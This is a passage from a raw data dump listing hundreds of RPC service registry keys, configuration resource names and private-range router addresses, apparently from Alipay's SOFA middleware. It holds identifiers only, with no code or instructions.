A","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lifemock_StressTestProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:gfpayrcv@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kbticketcenter.KbtBackendTickeSchedulerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CapitalBizServiceDRMResource.openSecurityMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.228.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rule.common.base.service.ScriptValidateService:1.0:${rule_service_unique_id}@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.relation.ProdRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:opswarecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.AmlDataViewMetaQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mfinwormhole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.BankInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fundapplication.common.service.facade.api.newyearone.NewYearOneInnerRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paydecision.service.api.PayChannelDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.eval.QueryUcdpTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.cdnType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.account.LifeConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.rule.ScriptManageService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcommerceprod.common.service.facade.spi.SpiRouteRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.scenario.api.fixed.ProductReviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.27.237.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.54.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradecenter.common.service.facade.query.FintradeBusinessTypeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:morderprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.59.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_M_CUSTOMS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finrtcalcenter.common.service.facade.dfinsight.analyse.QueryMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.proxy.DepositProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapPreWarmDrm.preWarmConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_troubleshoot_logFront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:publiccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetTransLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.ShortCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.drm.AftransSettleInitParamsDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.159.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insliveprod.common.service.facade.EventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.SettleDetailListQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.dailybalance.DailyBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcharge.common.service.facade.api.admin.AdBasicServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.crowd.CrowdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.TaskSwitchResourceImpl.factorIssueId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_SC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ipromotion.common.service.facade.api.prod.VoucherAwardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_ACCTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openitemcore.common.service.facade.api.servicelibrary.ServiceMerchantDataConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementFacade:1.0:cif@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finallocation.common.service.facade.api.AllocationMngSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.secretary.manager.WorkAssistantProjectInstanceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdop.common.service.facade.OpKaMonthSummaryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.fullAccessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.178.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_C_IBC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmarket.service.PcreditPollenRecordPraiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvest.api.facade.HsTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.InsReserveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unifiedlimit.facade.manage.DeployGroupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.cfpcenter.core.service.drm.AppContextDrmResource.fundcenterPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.cds.mng.TemplateSchemaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCOfflineTableVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_APSASMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.punishcenter.PunishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.consumeprod.common.service.facade.ConsumeRecordRzoneServiceV3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cloud.opscore.common.service.facade.deployment.AppReleaseStageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finfocore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.feeclcn.common.service.facade.FeeClcnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.StandardEventSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.newPlatformAppTaskCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.facade.trade.accountgold.CommoditiesAccGoldOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_OPEN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.timeout.common.service.facade.api.TimeoutQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.discount.common.service.facade.recordquery.DiscountRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.sandboxhome.aqcPaas_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.done.common.service.facade.v1.service.DoneProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_NAPOLI_alifi-cn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:trafficlimitcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.insttrade.clientReadGroupSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rulemng.common.service.facade.condition.RuleConditionQueryService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.rareword.RareWordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.rulebizscript.RuleBizScriptManageService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.merchant.facade.api.MerchantQueryService:1.0:imif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.zdatabusTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.aggregation.UserAggregateLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.usercenter.common.service.facade.customer.CustomerManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:custcenterprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.chongzhimobile.client.FlowUnitService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.business.BusinessSceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.trustlife.tis.mutual.claim.facade.endpoint.ReceiverCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.132.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.157.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finnet.service.facade.flux.FinnetSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.grayprod.change.drm.ChangePolicy.testUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:empty-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:developerops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cifin:name=com.alipay.cifin.core.service.resource.drm.ActionLogDrmResource.isRecord,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniselfop.facade.api.miniunifydata.MiniDataDimensionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.allocation.AstAllocProgrammeDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_10.15.229.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundboss.common.service.facade.meta.FundRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-DWALM-SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductWithPropertiesService:1.0:iposSpecialcheck@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashier.service.api.ApiSynchronizationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.MessageReachFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.definition.DerivedIndexOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestReplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@kgmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.opencore.service.facade.template.TemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.InstSignApplyRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:insxhbbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.24.6.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.ps.user.UserEducationInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.defincustomer.facade.api.user.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.quotation.drm.QuotationConfigDRMResource.localCacheExpireMinutes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.xts.bacs.api.BusinessActivityControlService:1.0:creditexprodBusinessActivityControlService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scsupport.common.service.facade.internal.WhitelistTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fidoserver.common.service.facade.IFAACertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.PrecollectOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.guess.BackstageGuessTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acordercore.common.service.facade.trans.TransFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.vouchercore.service.facade.api.voucher.VoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirecenter.common.service.facade.api.AgreementPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.databus.UserCreditApplySyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.meshynotify.common.service.facade.api.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchprod.common.service.facade.merchant.MerchantMccQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.content.ContentAggFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.242.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","openapi@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbmmweb.facade.HelloWorldService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwalletmng.common.service.facade.packageinfo.PackageInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chargefront.service.facade.credit.api.ChargeCreditQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.contract.repo.FinsMainContractRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.LabelQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.LabelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.api.MarkCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.AdvisorReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.CompensationAttachService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.privacyquestion.UnifyPrivacyQuestionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.risk.RiskRosterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.biz.BizTaskNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.api.vas.BFVasFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosec:name=com.alipay.infosec.client.drm.ClientDrmResourceManager.useOldClientFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_M_SETTLE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.overseaprod.common.service.exchange.ExchangeBranchManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.money.event.MoneyEventPublisher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.core.service.activity.ActivityDataDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessActionFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_finmodelops_indicator#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.apipay.instportal.common.service.facade.SignServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ecsign.common.service.facade.front.FrontManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.dcommservice.common.service.facade.api.PaymentHistory:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.manage.facade.api.TagManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.112.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.127.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dtsermng.common.service.facade.datatrans.DatatransCreateJobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.TenantConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.87.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mcommerceprod.common.service.facade.ChannelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:spcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.AssetConsultService:1.0:creditutcoreExternalAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.drillcenter.facade.spi.BizDrillAttackFacade:1.0:filebridge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.cif.client.drm.CifQueryRemoteCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.greenowner.AutoGreenCarIdentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushBroadcastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntRoleConsistQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.${fluxconf_app_name}:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.views,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-apshopcenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.paramcore.common.service.facade.manage.api.ParmDataOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepprod.common.service.integration.sync.MessageApiClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:abnclprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.91.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insofflineinvest.common.service.facade.service.ReplyEditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:pointprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.tag.TagInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gffund.common.service.facade.api.LogWriteoffFacade:1.0:caLogWriteoffFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.aggpage.AggregationPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.PlanRenewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbf.model.service.IPluginService:1.0:tbfmicroloan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.jbRiskSyncConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.service.facade.api.datasync.CompanyLogoSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.232.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbarcenter.common.service.facade.ar.ArMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.finfundtrade.FundDecisionFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.product.ProductSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.invoice.RecycleInvoiceHistoryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.FamilyAcOperationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.follower.FollowerCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.31.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promox.facade.crowd.CrowdDivideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepayfront.service.facade.errplateform.MobilePayCommonErrorCodeFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsceneprod.facade.PcreditCharityDonateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@